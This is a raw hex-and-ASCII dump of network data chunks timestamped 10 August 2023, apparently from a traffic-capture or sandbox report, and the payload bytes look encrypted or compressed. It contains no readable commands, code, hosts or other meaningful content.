                                                                                                                                                                                          Data Ascii: we+kQrW5}-^FvS={0`AzQ6!5cli>&L S~5*czNIY>;dzXd}Jj[M2@l5Ao|04ie4};T-6JZPQ#*_L-!"Sv>TK.YYW\ .8Gn`F]uv0nMa'in9w[W&,VD
                                                                                                                                                                                          2023-08-10 08:17:30 UTC37INData Raw: 16 e7 de c5 08 3e 4b 18 18 35 12 22 ee 13 13 52 ba b7 22 82 75 61 8b 89 fe c3 02 94 f6 ee e6 43 73 26 d2 a1 ca 91 94 f5 4e e5 9a 4e a7 c7 7a cb 63 7c 8e b0 7f 55 2f c0 2c aa 60 52 2e 7e 02 73 d5 5d a8 f6 2e f3 60 fe 4d 7c ba c8 8d 2f a1 8a 94 dc dc d2 45 dc 32 0b f3 57 94 d0 71 9a 9e 5f a4 e2 6d 7b f0 e6 5f 7e d5 05 cb 7f c8 2b c1 e6 fa bb ac 7c 24 b1 67 b1 38 38 2d b1 85 6b 7d 19 66 e2 54 35 12 2c 70 30 be 5e 7a 00 97 5f 4b 7e e5 6f 53 1a 87 dc 7a e1 90 76 a2 ef 6b 92 ef 81 a2 4e c6 c3 0b da 39 a2 f0 d6 1f e6 b7 55 61 36 be 6e 31 b8 d8 78 dd 8c 6d d9 43 78 6e f4 c8 ea c2 3f cf 52 b2 eb a7 c9 9d 61 f0 94 03 20 0e bb e8 4f 3e 40 78 eb d5 99 ce c0 70 0f a4 57 53 92 0a c9 c6 2a 35 86 79 63 05 d8 41 d6 a0 15 e4 ed 51 52 c6 1f f0 56 a1 39 2e 1b b7 db e6 55 2d
                                                                                                                                                                                          Data Ascii: >K5"R"uaCs&NNzc|U/,`R.~s].`M|/E2Wq_m{_~+|$g88-k}fT5,p0^z_K~oSzvkN9Ua6n1xmCxn?Ra O>@xpWS*5ycAQRV9.U-
                                                                                                                                                                                          2023-08-10 08:17:30 UTC38INData Raw: a1 92 50 8a 27 00 7c 26 4c 8c 5d fc 9c 2d 64 5d 07 1c dc 93 c7 83 59 19 cd 2d fd e4 ad 86 9f 07 28 06 f3 33 40 40 dc 81 93 40 86 cf d3 51 24 61 93 1b b5 3e 89 c6 6f a7 c3 6b fa 92 d1 51 03 a6 bb c4 3d b8 23 c0 78 16 c6 d8 ca 33 d3 c5 d8 98 09 db ba 78 62 99 5e 59 51 06 e7 ef 28 44 de 64 cc a0 dd 72 73 e3 6f 3b 3a 20 11 ce f7 c7 7c 8d cc 39 c5 75 43 8d d7 9c 18 8b 7b 2e 24 99 45 70 77 58 91 dc fb ac bc ce d7 a0 8c 52 4c d9 e5 3c ba df e8 a4 33 46 e9 a0 36 e0 aa 99 32 6f 94 98 3b ae 48 e3 57 3c c3 96 4f d6 ce f4 c2 ab d6 ef 51 94 8c 65 93 9f ce 97 34 15 69 39 e6 f4 81 3d 04 6d 48 9d f4 9b 97 01 f3 ca 6f 39 3d b0 fa de 0d 4a cb 02 da 65 61 b3 07 23 38 e3 f3 5d 3d b3 87 96 11 16 b3 7c b2 11 a8 8e ac 71 99 e6 10 51 74 99 f0 b4 68 c1 fb 55 df 12 71 36 fb b9 a2
                                                                                                                                                                                          Data Ascii: P'|&L]-d]Y-(3@@@Q$a>okQ=#x3xb^YQ(Ddrso;: |9uC{.$EpwXRL<3F62o;HW<OQe4i9=mHo9=Jea#8]=|qQthUq6
                                                                                                                                                                                          2023-08-10 08:17:30 UTC40INData Raw: d0 85 d8 c3 97 35 47 9e b0 99 79 5f 08 20 11 6d e9 b0 9f 15 31 90 23 25 8c 60 d7 50 8f 76 c8 05 ce d3 b7 53 12 c0 e5 3e ae 6a 4d 3f 75 a6 0c 47 ec c3 28 19 36 88 ac e9 6d f9 4a 87 f2 1b b0 9b 21 17 31 fa 23 0c 6b 99 6a d3 a7 6e ec 2a 27 4d f3 90 c6 e7 a0 92 74 a8 26 a0 0a 9f 4c 0c c0 23 15 41 52 61 5f e8 9c 64 3e 19 e4 79 1a e3 c6 b3 5c 68 fd 99 3e c2 70 41 b9 96 24 42 2a a5 ca 09 12 26 2b 35 27 32 00 c7 7b 51 d1 c7 e0 2f 23 c4 cd dd f9 62 c0 fc be c6 2e 79 0f ea e2 22 8a 55 2d 16 0f 16 a7 27 51 14 e0 94 7b 4a 8c 7c 44 4c 9f 81 88 24 70 c3 4c 87 2b 70 81 3b 3b 21 ff 66 ed 9c 04 c9 3a 15 2a 76 fe 80 0c 14 95 4a c7 d6 11 9b 03 8d 77 9c b2 19 df 26 0b 3c d6 41 32 5c 55 f4 1f 1e 34 c7 78 62 56 8c 69 41 ec 4f fc 52 7f 14 2f f0 e0 37 20 1f de de 62 49 d9 6b 59
                                                                                                                                                                                          Data Ascii: 5Gy_ m1#%`PvS>jM?uG(6mJ!1#kjn*'Mt&L#ARa_d>y\h>pA$B*&+5'2{Q/#b.y"U-'Q{J|DL$pL+p;;!f:*vJw&<A2\U4xbViAOR/7 bIkY
                                                                                                                                                                                          2023-08-10 08:17:30 UTC41INData Raw: 47 71 ed f6 da 2b 45 2b 1b df 88 5d 64 50 df 47 0e e9 b6 84 76 0d 17 fe c1 c4 13 3f 6b 21 47 2f 47 d1 de 9c 82 f0 25 d2 e1 e9 fb b9 26 ca 2a 1e 49 65 38 c4 64 3e c0 7d 11 47 6e 2b 7b 12 5a b3 aa c5 f3 b8 16 86 82 21 8a a9 af 01 7d 4a 24 a1 65 e8 41 ba 19 27 dd fc 43 cb 15 25 02 66 eb 41 3a 33 8d 13 52 29 b8 e8 58 e7 3e 37 9c 2a e1 86 be 3c 53 ef 7b 4a 28 98 a1 12 e0 33 6b 8f ae 30 3b 21 9a 13 ed d9 1c 66 00 e1 58 28 72 29 f3 75 e7 b2 3f 4a 94 61 db 1c 44 9a 3c 87 79 54 be 42 25 e6 7b 2e 4f 67 b9 50 d6 65 4e 2f eb c4 71 7c 5f 05 94 f5 8e 7e a6 c8 9a d6 7c 90 8c 9c 6b 6a 1e 26 a8 18 91 b7 b4 33 bf af b3 18 08 84 8d 0a 3b 6b f0 4f 9d d3 a6 b7 a4 33 a2 b0 52 a3 fe 23 a2 07 a2 24 a1 95 df 7d 54 5d e0 3f 74 7e d8 77 26 43 d6 4e 86 ef 24 c6 27 51 2f 06 bd fe 4f
                                                                                                                                                                                          Data Ascii: Gq+E+]dPGv?k!G/G%&*Ie8d>}Gn+{Z!}J$eA'C%fA:3R)X>7*<S{J(3k0;!fX(r)u?JaD<yTB%{.OgPeN/q|_~|kj&3;kO3R#$}T]?t~w&CN$'Q/O
                                                                                                                                                                                          2023-08-10 08:17:30 UTC42INData Raw: e2 51 11 72 f7 92 07 71 35 10 4e f9 0f 5a 77 ee ea 2e d9 cb 3b 10 0c 11 43 68 cf 9f 10 26 60 d4 41 06 f0 b7 98 37 62 72 fc 87 4d 66 85 99 12 54 95 ad b6 3e d5 6c 5a c2 0f 33 10 3c 1a 38 4c 60 f2 a4 51 81 49 49 b1 c7 8c 35 bf b9 f6 bd f5 d5 2a 24 44 62 76 95 2c c1 c1 56 23 57 80 56 68 89 8e b7 ab e9 31 c6 3c 3e 00 13 86 c9 77 28 14 ef ee a8 36 fd 6e 0d c5 74 6f 55 e9 a6 5a 16 fb 4c 9e 61 3b 79 51 dd 47 23 f8 1c 75 d2 cf be 86 c4 95 b2 8d 1e d1 43 e3 5d ba 24 ba 7b 23 41 75 da ab 0c c0 20 dc 15 59 35 92 70 17 53 d0 c3 e4 f5 b6 c3 3c 7d 8b 79 15 c6 7d af de ba 91 c6 a1 4f 62 08 e2 68 01 03 68 5d a9 e4 d5 e3 c5 5a 7c 8d fd ae cd 3a 0f 45 fc a4 5b dc 6f d9 4b 40 f4 b6 ba 58 b2 32 f0 cf e6 2f 37 9d 65 b8 79 b5 e2 9c 52 7d af ed ac b4 e8 14 07 64 5f ad d2 6c e8
                                                                                                                                                                                          Data Ascii: Qrq5NZw.;Ch&`A7brMfT>lZ3<8L`QII5*$Dbv,V#WVh1<>w(6ntoUZLa;yQG#uC]${#Au Y5pS<}y}Obhh]Z|:E[oK@X2/7eyR}d_l
                                                                                                                                                                                          2023-08-10 08:17:30 UTC43INData Raw: 8f d8 69 da 11 51 1c cd d9 d6 f5 d5 8b b9 46 60 7e b4 76 1d 91 4a ef b4 88 39 25 f4 cd 61 8b ae 99 a0 63 9e 13 16 3d 97 30 a5 40 80 4e 4e 18 cd e0 3e f9 71 85 02 1f 24 7a 4f b4 c3 f7 e0 2e 52 0a 3a fa 56 02 b0 ca 61 6f 8f 40 18 24 12 c4 6e 38 d8 bb 6a 49 f6 a0 6a 7b 89 f1 6b ac 60 69 cb b4 ba d7 38 37 9d cb 93 5a 4a 61 6c 79 c2 88 57 6a 79 b5 54 98 20 b0 a2 7d 34 e2 07 b2 54 63 ff 5e 1a b4 88 86 4e 6b 85 78 1e 18 73 fc 86 5e 86 2c 49 05 ab 93 b7 a6 2a f9 51 e8 9f a8 6d a7 7b f6 ea 68 f2 45 ba 78 77 8d a4 50 ae 61 78 b6 8f 02 aa 4d 5d c8 36 1d bb 3b d5 40 b7 e8 0b b3 0e 00 d7 f3 f0 60 51 1f 14 10 dd 2b 63 d9 b7 6d ff ac 84 9c c6 50 f7 9d 26 92 d9 fe e5 18 a2 99 6c d8 69 12 71 3f 2d a8 36 1f 48 18 b7 a0 4a 6f 60 25 47 a6 3d 8a 14 f2 5b 4c d5 cf 8e b8 24 83
                                                                                                                                                                                          Data Ascii: iQF`~vJ9%ac=0@NN>q$zO.R:Vao@$n8jIj{k`i87ZJalyWjyT }4Tc^Nkxs^,I*Qm{hExwPaxM]6;@`Q+cmP&liq?-6HJo`%G=[L$
                                                                                                                                                                                          2023-08-10 08:17:30 UTC45INData Raw: d3 2f 90 0b 48 2f 26 6b 5e bb c9 ff 36 7b 5c 88 21 59 e1 c1 ba c5 5c e3 c0 9d 48 62 bd f6 fd ec f7 e9 94 5f a4 14 ba 94 50 c3 8c e5 a0 8e 2f 86 2f 1c cd 0a 00 53 8b de f0 97 fc f9 eb 35 57 4d ff 4d b5 4a 72 2d 13 0f 05 90 ce 22 22 ed 68 2b 3e c2 07 8d 03 82 dc cb 23 a0 41 b3 08 43 07 b6 7e 33 b5 91 a0 2f c4 8e ee 0a 0f de ec 6f b3 79 8b 28 90 22 3b 8c 16 7c 8e f9 e4 15 69 59 10 20 e5 47 d6 94 99 51 fe 16 c2 b8 60 5c c0 27 df 3a 16 1f 83 00 d2 31 a2 2d bc 9e 28 c4 0e c6 42 bf ba c1 61 0c d8 13 c7 f7 56 b3 a5 a4 6d b3 22 ee ac 20 c0 67 a2 e3 d7 11 bf 2f b1 d0 76 51 01 5b 94 58 2b 9b 90 b7 f1 94 21 ff fb ae 3e 68 6e 47 21 23 9e 7a 59 67 6e d2 b3 28 ec bf 12 80 ff ed a0 fe 7f e2 da 03 61 c8 32 3c ef 4f bb d1 36 5d 98 e6 73 e9 e2 1e 68 dd 14 fb 4a 1d da 2c 59
                                                                                                                                                                                          Data Ascii: /H/&k^6{\!Y\Hb_P//S5WMMJr-""h+>#AC~3/oy(";|iY GQ`\':1-(BaVm" g/vQ[X+!>hnG!#zYgn(a2<O6]shJ,Y
                                                                                                                                                                                          2023-08-10 08:17:30 UTC46INData Raw: e0 20 00 1b b5 69 e7 fb 7d 5b ad c4 0b 45 b1 e5 97 d9 fa 1e e5 61 64 6c 22 b7 d5 17 a3 40 41 2c a6 4b ba 61 0e 1c 40 b0 4a 4d bd 04 be 41 db df 34 76 0f 25 16 f6 16 4d 15 e6 ea 43 9a 4b d1 7e 41 ea d4 03 9d ff 33 57 fc 77 ac fa 3e 2e 82 30 e0 9c c6 f4 78 9b a4 1a a2 ec 9c 33 5c bf ed 1e 24 79 0c 3a 12 9b 98 ec 80 50 61 58 de 52 a2 4e 1a 55 29 29 1f bd 9d 80 53 bb b1 65 99 48 66 6d 3b 65 cb 77 61 63 18 19 45 7b 57 92 d7 ee 16 88 85 07 fd 30 97 ff 19 84 3a 93 ef 52 6f f1 ff f8 7d 5b ff 70 7c 14 67 e8 fd ca b5 eb ac de 9e 1e ea fa 7e 7f 05 31 e7 a4 f3 20 a2 11 1c 11 5c 3f 4d f9 bc f6 ad 94 b7 21 66 83 c0 81 44 70 0a ed 79 79 38 31 a1 5b 66 18 59 c8 15 9b 9e c4 d2 9c 7f ff 3e c5 90 34 e7 24 e4 b2 a9 f3 56 f0 2d 57 c6 38 e9 e4 af 48 dc e1 18 d7 1a 52 b0 85 f3
                                                                                                                                                                                          Data Ascii: i}[Eadl"@A,Ka@JMA4v%MCK~A3Ww>.0x3\$y:PaXRNU))SeHfm;ewacE{W0:Ro}[p|g~1 \?M!fDpyy81[fY>4$V-W8HR
                                                                                                                                                                                          2023-08-10 08:17:30 UTC47INData Raw: 5c 9d a9 15 e1 94 2b e4 3a 9e 92 11 34 ea b3 35 08 4b ce 06 b7 2d e7 4a 27 0e a5 11 0f ad 14 97 e4 7a d9 44 69 79 38 46 47 76 ac c9 00 67 6e 12 61 52 72 9f 35 39 22 00 06 c1 87 16 64 53 c3 4d 21 ab 36 ef 8c 26 e4 77 26 11 72 c9 85 ba fd 58 ab 29 d7 5f 85 20 5a 84 ca 6c a9 dc 6e 52 83 c1 a4 a4 b0 db e0 8f 3c 59 b1 90 f2 13 81 fa 98 6d 8c 82 00 43 eb d9 ee ff 09 20 a6 7c 16 15 71 af 2c e6 86 f5 c7 43 83 87 fe 68 a9 10 4f f9 f7 1f fc 53 d9 e2 c2 f8 6f 7e e2 48 62 d2 7a e2 56 ef 80 ff 7b f5 02 43 b3 21 13 c1 0c 82 81 cb d0 e3 ff cd fc 40 c3 cb 43 49 32 4e af 42 d1 87 11 27 fe bc d1 b0 dc 85 b7 65 90 08 14 3f 4a b5 2d 3e ec 23 b7 83 5c b3 de 9f a9 9b 5a c7 8f e2 eb a1 c2 14 20 31 66 f4 dc f4 d8 c2 4e a0 d3 75 24 41 dc be 3c 75 c3 f8 b2 23 35 87 88 71 9e e7 3e
                                                                                                                                                                                          Data Ascii: \+:45K-J'zDiy8FGvgnaRr59"dSM!6&w&rX)_ ZlnR<YmC |q,ChOSo~HbzV{C!@CI2NB'e?J->#\Z 1fNu$A<u#5q>
                                                                                                                                                                                          2023-08-10 08:17:30 UTC48INData Raw: 00 de ee 5b 7b 3e 39 a6 89 5c cc 10 59 90 56 8e 60 51 e6 24 91 65 76 92 9c 65 ad 0d ee ac b8 1d cd 4b 31 b6 62 79 b1 fb 1a 85 d4 63 12 a6 e5 75 60 e3 04 e0 39 09 66 44 21 1d 26 62 b3 80 84 98 37 ff 55 15 c6 4f a1 56 d7 b8 fa 37 0b ed 06 b5 c4 2d 6c f5 d7 19 1b c0 71 3d 7d f4 85 19 ce 78 8c e4 a5 b2 31 3c b6 06 5f b3 f3 d1 44 90 eb 9e 5f 7e 44 55 47 70 3d f9 55 17 83 c7 3b 6f 7f cf 41 3e 43 4a 55 1a e5 10 dd dc c1 78 70 02 71 3a 8f ec e7 b7 07 88 40 ea 7a 8f 97 18 c3 32 92 a4 39 63 bc 10 17 b6 38 57 16 df e7 48 74 4b 80 a6 da 43 73 19 df 1b 6a 8c c9 4e 19 bc f0 1e 64 7e a7 9b 80 21 da ee e8 c8 b7 bb e7 ae 6a 43 e5 27 88 22 6c e4 d4 25 5f bb 07 79 57 bc 2d 22 2f a7 ae 5a 9b a5 24 78 b1 c3 3c 0d 84 6e 03 a9 34 c8 f2 53 84 3f 89 78 3b 9e 88 b7 43 47 9b 22 f5
                                                                                                                                                                                          Data Ascii: [{>9\YV`Q$eveK1bycu`9fD!&b7UOV7-lq=}x1<_D_~DUGp=U;oA>CJUxpq:@z29c8WHtKCsjNd~!jC'"l%_yW-"/Z$x<n4S?x;CG"
                                                                                                                                                                                          2023-08-10 08:17:30 UTC49INData Raw: 78 d2 21 88 53 68 aa 39 ce fc 3a e6 72 d1 f5 9e 70 4d 26 e2 37 9f 92 f7 b8 bc ed c2 2f 72 ce 78 45 25 6c 01 c2 b2 a8 2c 33 28 3b 10 de 5d e5 72 20 6a a0 64 04 3f be 46 4c 27 f9 55 7b de 7b d5 8b c6 c0 12 b1 ac c2 08 2e ab d4 66 b2 92 c3 15 fb 0e fa 22 e9 62 71 3e b0 c9 14 30 3e d5 06 d8 dc 0a 44 35 01 9e c9 00 d8 f9 8c 54
                                                                                                                                                                                          Data Ascii: x!Sh9:rpM&7/rxE%l,3(;]r jd?FL'U{{.f"bq>0>D5T
                                                                                                                                                                                          2023-08-10 08:17:30 UTC50INData Raw: af 33 a2 07 39 c9 45 99 bf 21 be e6 be b2 82 ec 15 11 a7 76 8c dd 1e 42 4f 85 19 49 9a c4 50 b2 c9 46 97 8a e9 73 c3 ba 1c bb a4 76 1e a9 e8 b9 38 02 8e 74 ea fd 78 0d ae 62 58 af c1 83 88 e6 f7 83 8c 9e 00 7a 89 4e 78 be fd b3 83 77 09 63 83 2c 11 22 51 cc e4 9f db 1e f6 f8 5b 5e 10 67 cf fb ac 1b ea 55 d2 73 5a 48 b9 ba 65 3a 0a 0f 8c 9b 13 17 41 8e b1 09 1c 3d 39 16 6b 71 8a ab 91 eb 10 20 bd c2 a0 1d b7 18 41 a9 b5 86 2a 2b 7f b3 6c e6 a9 3e af 6f 39 dc f5 9b 89 5d 74 63 3c 81 05 49 83 50 3d e5 13 20 ed 31 0f e3 8b 60 3d 3e 50 15 1f 0f 72 5b 1c de 2a 3d e6 bb 24 c4 29 d6 8e 14 1a 5f f5 0e 8d 20 cb 92 e9 8c 24 08 17 23 9d 0b 1a 3d da 7c b9 e9 5c 5b d1 8e 38 14 13 22 cf 05 31 15 30 91 2e 8b 72 50 9a f6 87 3e b0 c6 15 fb 71 c2 6a 79 50 41 ee a3 7a bd ef
                                                                                                                                                                                          Data Ascii: 39E!vBOIPFsv8txbXzNxwc,"Q[^gUsZHe:A=9kq A*+l>o9]tc<IP= 1`=>Pr[*=$)_ $#=|\[8"10.rP>qjyPAz
                                                                                                                                                                                          2023-08-10 08:17:30 UTC51INData Raw: 7e c4 78 85 8d 03 a8 82 b1 f4 5c ea ab b0 52 1b 3f 8c e9 33 23 0b 24 e5 66 9f 54 c3 d4 5e ec 90 10 44 88 f2 77 43 f1 77 1b ba 0e 22 ca 93 d5 5c ad 4a ad 71 d0 4c c0 9e c8 18 a6 47 d4 3a d6 51 f8 fd 57 eb 44 6c 04 f0 82 36 d3 64 66 dc 5f 13 fe bd ec 5b 67 28 13 00 58 00 71 f9 a0 3a 51 fd c7 fe 70 e5 c2 5b db a0 d4 a8 9d f0 5a 39 eb ac d6 86 09 0e ce de 45 5e 44 43 95 ce be 0f 47 0c 3d fb 9f ef 86 f3 8c bf 09 c1 21 12 6a d0 ac 47 2a 38 01 55 34 de 6b d0 43 f8 41 2c e8 03 9c 13 4d 06 fb 4c 38 92 f6 ac d9 86 13 17 cb 54 4f 7a f3 79 98 f4 12 b3 a2 fe 69 52 12 35 b7 82 4a a7 3d 23 5d 3a d9 94 99 cf cf 3e 9a 2c b2 a4 66 5f 58 ad c6 0f c6 cb ce 4d 75 ec ee bc 6a 84 dc 44 bc 10 21 ad 54 55 27 5b 60 2a 3f 9e 00 a9 29 8b 05 a3 f9 fd ea 8e af c6 e7 48 81 1b a8 4a 02
                                                                                                                                                                                          Data Ascii: ~x\R?3#$fT^DwCw"\JqLG:QWDl6df_[g(Xq:Qp[Z9E^DCG=!jG*8U4kCA,ML8TOzyiR5J=#]:>,f_XMujD!TU'[`*?)HJ
                                                                                                                                                                                          2023-08-10 08:17:30 UTC52INData Raw: a0 b6 61 63 9d ba e3 b9 d3 b9 94 71 dc 37 56 24 fa fe fd 85 55 67 46 88 83 17 88 fd 8d 98 13 5d f4 85 ca 7d cf 94 cb 44 2a 91 78 d9 f0 f5 a7 59 4e 4b f2 2e 84 b2 09 dd f8 9d 50 1a d4 69 0f 38 7a 6d 62 d9 28 7e 66 ee 99 a9 78 4b ea 56 0a 45 84 23 a2 bc bd 3a a0 85 c0 04 49 cc 69 a2 aa 21 71 e7 00 e3 30 c4 1e 1b 67 cd 9a be b1 52 2c fa 67 c6 43 45 c7 b2 3b 73 08 94 54 4b 42 62 df 09 11 f7 09 04 06 17 8e 9b 95 e5 14 95 5c 9a 98 a1 bf b0 bb 64 b2 f8 ca 58 07 6f ed 77 6d 32 91 80 b8 e6 5e 38 40 d2 8b 75 02 51 14 4f 74 a5 c4 ee 6a f4 17 f8 ba 16 11 b7 6a 7c c2 fc 91 34 70 1f 3a 89 9a e0 5e 2b 93 b6 f7 e4 81 b7 a0 3d 09 d8 7b ae fd ef c3 c9 07 08 1d 08 72 92 04 2f 2c e3 3e ce 34 87 d4 ed 83 7e c3 3e 1d 7d c6 ec ba 56 96 0a 56 89 6d 84 43 8e 2c 32 6f 5f e7 cc 60
                                                                                                                                                                                          Data Ascii: acq7V$UgF]}D*xYNK.Pi8zmb(~fxKVE#:Ii!q0gR,gCE;sTKBb\dXowm2^8@uQOtjj|4p:^+={r/,>4~>}VVmC,2o_`
                                                                                                                                                                                          2023-08-10 08:17:30 UTC53INData Raw: e2 88 bf 50 97 b4 8e 60 47 b1 5a e8 4b 91 c1 59 bf 22 83 c1 b5 8d bf d0 46 a5 6d 03 b8 d8 a4 62 0a 6f e5 37 b2 a5 23 27 d0 c8 a5 a5 d4 da 51 6c 05 de 05 54 d0 af 8a 29 23 bd 73 d6 ac 3a 80 98 ff ec 91 20 66 1e 11 cf 5b 13 2a 93 5c 2b eb 7f 27 27 2a e7 9f aa 98 20 3e 21 13 56 e8 11 19 38 f9 6f 59 f9 e7 87 85 3b bd 19 31 85 69 11 67 70 ce f7 6a 32 16 a1 bf 6e 4f 7f 17 84 c4 20 4c d0 f3 99 23 0a d3 79 13 7a 28 63 b3 66 3e 8c 47 46 48 67 ee a0 32 4b 40 11 03 80 18 84 71 6a 4f 69 88 3b 85 b5 8a ba 50 f8 35 c4 14 66 7c c4 0d 28 dc 5e 78 9a b0 94 5b 58 0d 0d 8c ac fe e6 d5 84 33 e9 b1 06 62 9f 17 91 1c c3 80 ac 16 94 4d b4 0e e3 89 79 62 dd 49 0c e1 8e cc 6b 41 93 50 dc fa 38 21 28 5e cc 18 e5 f8 e2 cc 0a 82 06 c9 09 0d a3 11 be 93 26 9a 73 16 2b d2 d5 27 01 b7
                                                                                                                                                                                          Data Ascii: P`GZKY"Fmbo7#'QlT)#s: f[*\+''* >!V8oY;1igpj2nO L#yz(cf>GFHg2K@qjOi;P5f|(^x[X3bMybIkAP8!(^&s+'
                                                                                                                                                                                          2023-08-10 08:17:30 UTC54INData Raw: 9b e5 a8 f3 3b c6 84 da ec f8 b7 80 d1 28 53 23 fa 40 b0 06 21 25 ac fe 9d 34 1f 89 90 06 5f 59 02 9d 1d c0 74 a2 c6 b1 8e 03 09 e3 c8 6e e8 3e 4a 55 e2 e7 1a 03 9d 47 a0 2f 9e f2 15 dd bf 7d 3a 38 24 82 97 9c 61 95 de 16 7a 05 c6 cc a3 0e 88 7b c2 13 42 5d 9d 25 4e 9d 63 9a ac b9 c0 6d fe 85 61 76 f5 b9 fd a0 8e 5a 54 ea fa e8 10 c8 19 33 aa 3f 25 36 db 2d 49 85 c7 ad b4 d8 a8 32 a4 6d d9 df 28 5c bd d2 76 e8 c6 64 d7 41 9b 8b 78 68 e1 e3 af da 34 25 b7 d3 60 3e c0 b6 6b ac 58 b6 61 14 af 5f 35 29 2e e9 93 2e fd cf 73 9a 84 98 8e 4c 09 35 f0 a6 f1 3f af f6 19 49 77 86 0d 76 5c 0b 0a 51 29 8a ed f3 a2 70 8d d7 ca f7 00 f7 d8 f3 9a 3c ef c2 a9 1d 3f aa db f7 f7 aa d2 c7 0c 17 be e3 87 80 fe d8 fe 48 98 ca 9d f9 ce 3a e5 bc ef fc a8 b0 02 69 ab 99 d9 fa 8c
                                                                                                                                                                                          Data Ascii: ;(S#@!%4_Ytn>JUG/}:8$az{B]%NcmavZT3?%6-I2m(\vdAxh4%`>kXa_5)..sL5?Iwv\Q)p<?H:i
                                                                                                                                                                                          2023-08-10 08:17:30 UTC56INData Raw: 0b 4d d3 d4 53 1c c6 07 24 5a 9d 61 21 17 93 ed 26 a0 bf 93 43 fe 6c 58 23 3f 94 00 08 a7 14 2a 4b d8 43 ec de 24 01 04 fa 72 59 87 dd cc f3 97 20 ef c7 31 f2 4e 72 b4 c9 4b cf 1f a5 96 85 cf 90 30 b8 63 12 63 1a 90 2c 24 f3 cf 0d 9e d3 9c b0 52 2c f7 f3 85 cb 79 ba 39 dd df 9b e9 f5 9c 5e 2b 2e d8 6f 35 65 4f 42 e7 95 8b 1a ab b0 9c 2e 38 5e 21 26 39 ab ff 2b 84 80 9e 7a c4 f2 50 84 d4 b0 0b 23 a7 d7 d2 cc 8a d0 f6 59 ca 10 00 9b 01 6d 7d 4a 19 96 e0 68 fb a9 a4 9b 02 f3 9c c0 5d 37 f6 ca 55 ee 94 a5 f5 96 e4 12 a6 43 2f ce 28 ef 4b 78 37 b0 ea a6 f8 38 c0 22 c9 83 02 e7 81 da 01 b6 38 6a da 08 b5 fb 7e c3 7e 07 2c 56 49 b3 e0 5b de e3 46 3d 71 36 22 7d f8 05 5b f2 be d5 7f f5 c5 62 d5 6e 0a b5 8d c1 95 b7 bb 08 6f 0a 3b f2 cd 56 59 55 ce ef 4b d8 1f 91
                                                                                                                                                                                          Data Ascii: MS$Za!&ClX#?*KC$rY 1NrK0cc,$R,y9^+.o5eOB.8^!&9+zP#Ym}Jh]7UC/(Kx78"8j~~,VI[F=q6"}[bno;VYUK
                                                                                                                                                                                          2023-08-10 08:17:30 UTC57INData Raw: de b5 7e f2 74 1a 49 af 86 84 78 95 61 6e 57 ef fa 01 df d5 2a 3e 6d ac 95 80 17 71 98 9d 55 b6 8a 4a 2f 6b 6a e1 ec 52 49 9b a3 cf 68 cf 3e 74 2a b9 39 97 c9 d9 af f4 7e f1 06 4e 8f 5c db 95 5b ca 25 f2 81 6a b4 0b 49 7e 1c e1 d6 29 0f d1 eb b1 3b c0 97 49 13 fc fd 02 f1 74 4c 4d 4b d7 e9 bc eb f9 af 08 12 ab fc 3d 44 70 d7 2c 68 cc 04 5a 9c 87 b3 cf 22 76 3d dc 68 f0 34 df a9 82 1a 16 86 9e 21 34 9b 1c 4b c4 21 4f a2 74 df 91 ac 4c 2a 0b b0 c1 df e5 95 b1 3a 95 0d 80 52 a8 2e 68 bc bf 54 c2 81 c2 1a 79 70 cb 4c a5 aa ce b0 57 06 db 34 2c 13 78 dc 31 29 a4 d9 43 3b b2 53 a0 b0 94 cf ed cf 64 b3 fb e7 26 84 16 46 87 f7 b9 b6 4d 60 82 41 4c 71 8e 37 31 4d 50 46 3d a8 cb 66 ba 6f 43 a3 b6 d5 98 c2 59 85 c1 2c a8 db c7 90 37 d8 f4 ab ce 16 a0 5c 0f ab 0f ef
                                                                                                                                                                                          Data Ascii: ~tIxanW*>mqUJ/kjRIh>t*9~N\[%jI~);ItLMK=Dp,hZ"v=h4!4K!OtL*:R.hTypLW4,x1)C;Sd&FM`ALq71MPF=foCY,7\
                                                                                                                                                                                          2023-08-10 08:17:30 UTC58INData Raw: cb d1 5b 2f c6 e5 c7 11 08 39 48 b5 4c f6 02 e6 a8 1b 7f 5d ad 38 c6 cb c7 8e 50 37 a3 be f0 09 6f a9 c5 5f 6e 4e b8 34 6c 07 b5 4e ab cd 73 bc ef be 16 27 56 1c 44 d4 e2 3e 6c 23 8d 8d ee a5 17 d3 6c 80 66 35 78 ad f6 26 c9 3c 60 23 90 00 04 da 11 f1 1e 80 62 31 52 36 cb 44 ba a0 28 5f 73 60 47 63 f1 02 8e 05 f4 de ed 0d cf 47 a5 95 e0 89 58 96 70 08 36 d0 96 88 b4 a9 45 50 f1 96 f8 7e 07 93 88 60 f1 59 b6 d3 fc 38 cb 96 3f 1c a8 32 6d 47 fb 60 11 9c e7 a6 eb 3d 45 e3 e3 60 34 c9 c4 e8 7f e1 f6 e7 d0 19 4e 84 7b e4 ab b2 ec 78 a0 51 02 2a 11 4b 7c 24 b5 d6 bb c8 f6 16 98 a6 b3 f9 ef 92 d5 e5 12 d6 41 db 2f 27 4c e8 66 49 cf 31 f4 d7 31 6d bf 08 fc 3d de 6b 3f 7a b1 59 7f e1 d4 bb cf f7 b0 36 f3 86 ab 5e d7 56 77 2a f8 19 26 2b 36 0f ea 5c 00 aa 6a 7d 0c
                                                                                                                                                                                          Data Ascii: [/9HL]8P7o_nN4lNs'VD>l#lf5x&<`#b1R6D(_s`GcGXp6EP~`Y8?2mG`=E`4N{xQ*K|$A/'LfI11m=k?zY6^Vw*&+6\j}
                                                                                                                                                                                          2023-08-10 08:17:30 UTC59INData Raw: 72 ed 93 06 73 92 83 70 c8 0f 92 d6 84 f6 69 cd cc 35 43 c2 ec 01 7b 04 c1 4e fc 1a 44 bb 59 08 7c 52 e7 0b 42 8e 08 7d 4b c9 fc a2 57 90 37 9e e0 32 47 f6 b1 c0 25 11 e7 0a 84 6c 27 c3 aa 31 ac bf 6f 99 8a c7 ec 09 51 1a 96 36 61 92 43 86 40 59 4e d8 05 9c fb e4 c1 06 05 c1 1c 0f 5a b9 40 a4 83 c0 1e bf 6a b1 60 da a6 fb 3d 23 91 57 9f 39 e7 b7 2c b5 d7 83 3e a8 1b 94 c1 8f f5 ca d8 98 72 0d 37 d6 b4 88 82 b5 b3 81 86 4a 1c ed d7 1f 8e ff 87 e1 d1 3d bb 34 e6 21 06 fd 10 69 2b d3 6d e1 a8 f0 e7 8b 5a 34 af df a8 73 f2 94 e9 d7 21 d6 f9 f0 d2 d1 16 35 2a 5f 54 0d 17 77 6d f4 97 5b 88 2d 65 f3 38 9a c1 a5 7e bb b8 ff 95 0f c1 ac 2f 6b 41 16 ee 2e 